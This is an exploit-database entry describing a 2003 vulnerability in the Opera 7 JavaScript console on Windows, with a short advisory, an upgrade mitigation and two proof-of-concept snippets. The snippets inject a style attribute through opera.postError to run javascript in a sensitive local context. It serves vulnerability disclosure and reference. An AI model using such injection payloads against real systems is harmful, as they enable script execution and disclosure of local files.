header-logo
Suggest Exploit
vendor:
Opera
by:
SecurityFocus
7,5
CVSS
HIGH
Opera JavaScript Console Vulnerability
79
CWE
Product Name: Opera
Affected Version From: Opera 7
Affected Version To: Opera 7
Patch Exists: YES
Related CWE: N/A
CPE: opera:7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2003

Opera JavaScript Console Vulnerability

A vulnerability has been reported for Opera 7 browsers for Microsoft Windows operating systems. The vulnerability exists in the Opera JavaScript console. Attackers may exploit the vulnerability to execute script code in a sensitive context. Exploitation of this vulnerability may lead to disclosure of local file contents.

Mitigation:

Upgrade to the latest version of Opera.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6755/info

A vulnerability has been reported for Opera 7 browsers for Microsoft Windows operating systems. The vulnerability exists in the Opera JavaScript console. Attackers may exploit the vulnerability to execute script code in a sensitive context. Exploitation of this vulnerability may lead to disclosure of local file contents.

open("file://localhost/console.html","","");
opera.postError("http://\"style=\"background-image:url('javascript:alert(location.href)')\"");

open("file://localhost/console.html","","");
opera.postError("file://\"style=\"background-image:url('javascript:alert(location.href)')\".");